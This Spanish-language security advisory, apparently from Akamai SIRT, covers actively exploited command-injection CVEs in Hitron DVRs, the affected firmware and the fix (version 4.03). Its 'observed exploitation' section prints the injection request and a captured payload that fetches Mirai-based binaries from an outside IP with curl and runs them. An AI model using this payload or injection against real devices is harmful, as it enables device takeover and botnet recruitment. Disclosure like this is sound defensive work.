Vulnerabilidad explotada de forma activa en dispositivos DVR de Hitron: corregida, parches disponibles
Resumen ejecutivo
El equipo de respuesta a incidentes e inteligencia en seguridad (SIRT) de Akamai ha publicado una actualización adicional a la serie de avisos sobre InfectedSlurs desde que uno de los proveedores afectados ha publicado parches y directrices.
La vulnerabilidad en Hitron se ha identificado en el mundo real y se le han asignado los siguientes ID de CVE:
CVE-2024-22768 : se ha calculado una puntuación base de CVSS v3.1 de 7,4 ; la cadena vectorial CVSS es (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
CVE-2024-22769 : se ha calculado una puntuación base de CVSS v3.1 de 7,4 ; la cadena vectorial CVSS es (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
CVE-2024-22770 : se ha calculado una puntuación base de CVSS v3.1 de 7,4 ; la cadena vectorial CVSS es (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
CVE-2024-22771 : se ha calculado una puntuación base de CVSS v3.1 de 7,4 ; la cadena vectorial CVSS es (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
CVE-2024-22772 : se ha calculado una puntuación base de CVSS v3.1 de 7,4 ; la cadena vectorial CVSS es (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
CVE-2024-23842 : se ha calculado una puntuación base de CVSS v3.1 de 7,4 ; la cadena vectorial CVSS es (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
Las cargas útiles maliciosas capturadas en el mundo real instalan un malware basado en Mirai para crear una botnet de ataques distribuidos de denegación de servicio (DDoS) .
Hemos proporcionado una amplia lista de indicadores de compromiso (IOC), reglas de Snort y reglas de YARA en la investigación original para ayudar a identificar estos intentos de explotación en el mundo real y ayudar a detectar posibles infecciones activas en redes de defensores.
Lo que necesita saber
Como parte del descubrimiento de InfectedSlurs, el SIRT de Akamai detectó vulnerabilidades en varios modelos de dispositivos DVR de Hitron que se están explotando en el mundo real. Los dispositivos Hitron los fabrica Hitron Systems en Corea del Sur.
Esta vulnerabilidad permite que un atacante autenticado consiga inyectar comandos del sistema operativo con una carga útil que se entrega a través de una solicitud POST a la interfaz de gestión. En su configuración actual, utiliza las credenciales predeterminadas del dispositivo en las cargas útiles capturadas.
Los dispositivos y las versiones de firmware afectados son:
DVR HVR-4781: versiones de la 1.03 a la 4.02
DVR HVR-8781: versiones de la 1.03 a la 4.02
DVR HVR-16781: versiones de la 1.03 a la 4.02
DVR LGUVR-4H: versiones de la 1.02 a la 4.02
DVR LGUVR-8H: versiones de la 1.02 a la 4.02
DVR LGUVR-16H: versiones de la 1.02 a la 4.02
El proveedor (Hitron Systems) ha publicado nuevas versiones de firmware para abordar las vulnerabilidades. El proveedor sugiere actualizar a la versión de firmware ≥ 4.03 para todos los modelos afectados lo antes posible. Los avisos también han sido publicados por CISA y KISA. KISA también ha publicado avisos relativos a CVE individuales, que se pueden encontrar en los siguientes enlaces:
Explotación observada
A finales de octubre de 2023, los analistas del equipo SIRT de Akamai observaron un aumento de la actividad en nuestros señuelos dirigida a un puerto TCP que rara vez ha sufrido un uso indebido. Las sondas eran de baja frecuencia y parecía que intentaban primero una autenticación a través de una solicitud POST a /cgi-bin/system_ntp.cgi (Figura 1) seguida de un intento de explotación de inyección de comandos (Figura 2). Los dispositivos objetivo son los dispositivos DVR de Hitron Systems que son vulnerables a la RCE mediante la inyección de comandos (Figura 3). Una vez autenticado, el atacante ataca la vulnerabilidad de inyección de comandos en el parámetro timeserver mediante una solicitud POST a /cgi-bin/system_ntp.cgi.
URL: /cgi-bin/system_ntp.cgi
POST BODY:
enc=11&ip=[targeted IP]&username=[REDACTED]&password=[REDACTED]
Fig. 1: Intento de autenticación
URL: /cgi-bin/system_ntp.cgi
POST BODY:
lang=ja&useNTPServer=1&synccheck=1&public=0×erver=[RCE
PAYLOAD]&interval=60&enableNTPServer=1
Fig. 2: Intento de explotación
curl+http://45.142.182.96/spl/mips+-O;+chmod+777+mips;+./mips+kdvr;curl+http://45.142.182.96/spl/x86+-O;+chmod+777+x86;+./x86+kdvr;curl+http://45.142.182.96/spl/mpsl+-O;+chmod+777+mpsl;+./mpsl+kdvr;curl+http://45.142.182.96/spl/arm+-O;+chmod+777+arm;+./arm+kdvr;curl+http://45.142.182.96/spl/arm5+-O;+chmod+777+arm5;+./arm5+kdvr;curl+http://45.142.182.96/spl/arm6+-O;+chmod+777+arm6;+./arm6+kdvr;curl+http/45.142.182.96/spl/arm7+-O;+chmod+777+arm7;+./arm7+kdvr
Fig. 3: Carga útil de RCE capturada
Protección
Los usuarios de DVR de Hitron que utilicen dispositivos afectados por esta vulnerabilidad deben actualizarlos inmediatamente a las versiones de firmware más recientes disponibles (≥ 4.03), que corrigen la vulnerabilidad de RCE.
HVR-4781: versión 4.03
HVR-8781: versión 4.03
HVR-16781: versión 4.03
LGUVR-4H: versión 4.03
LGUVR-8H: versión 4.03
LGUVR-16H: versión 4.03
Además, como protección frente a esta y futuras amenazas, se deben implementar diversas medidas de seguridad. En primer lugar, las organizaciones y las personas que utilicen los dispositivos afectados deben cambiar las credenciales de inicio de sesión predeterminadas de inmediato para reforzar la seguridad. La supervisión periódica del tráfico de red y los registros puede ayudar a detectar con antelación las actividades sospechosas. La instalación puntual de parches y actualizaciones de seguridad del fabricante del dispositivo es crucial para solucionar la vulnerabilidad identificada.
La colaboración con investigadores de seguridad, proveedores de información sobre amenazas y otros profesionales del sector puede ayudarle a mantenerse informado sobre las amenazas y las vulnerabilidades emergentes. Por último, el mantenimiento de un inventario actualizado de dispositivos conectados y la implementación de una segmentación de red pueden limitar el posible impacto de dichos ataques.
Conclusión
Abordar los problemas de seguridad identificados en los sistemas de Hitron y los dispositivos asociados requiere un enfoque polifacético que combine la concienciación del usuario, la aplicación rápida de parches, una supervisión proactiva y la colaboración dentro de la comunidad de la ciberseguridad. Con la adopción de estas medidas, las organizaciones y las personas pueden reducir significativamente los riesgos que conlleva la actividad maliciosa observada.
Manténgase informado
Para mantenerse al día sobre las amenazas y otros hallazgos del SIRT y otros grupos de investigación de seguridad de Akamai, síganos en X (anteriormente Twitter) o consulte nuestro centro SIG.
Akamai SIRT desea expresar su agradecimiento al personal de CISA, US-CERT y KISA por la ayuda prestada para informar sobre estas vulnerabilidades a los proveedores.
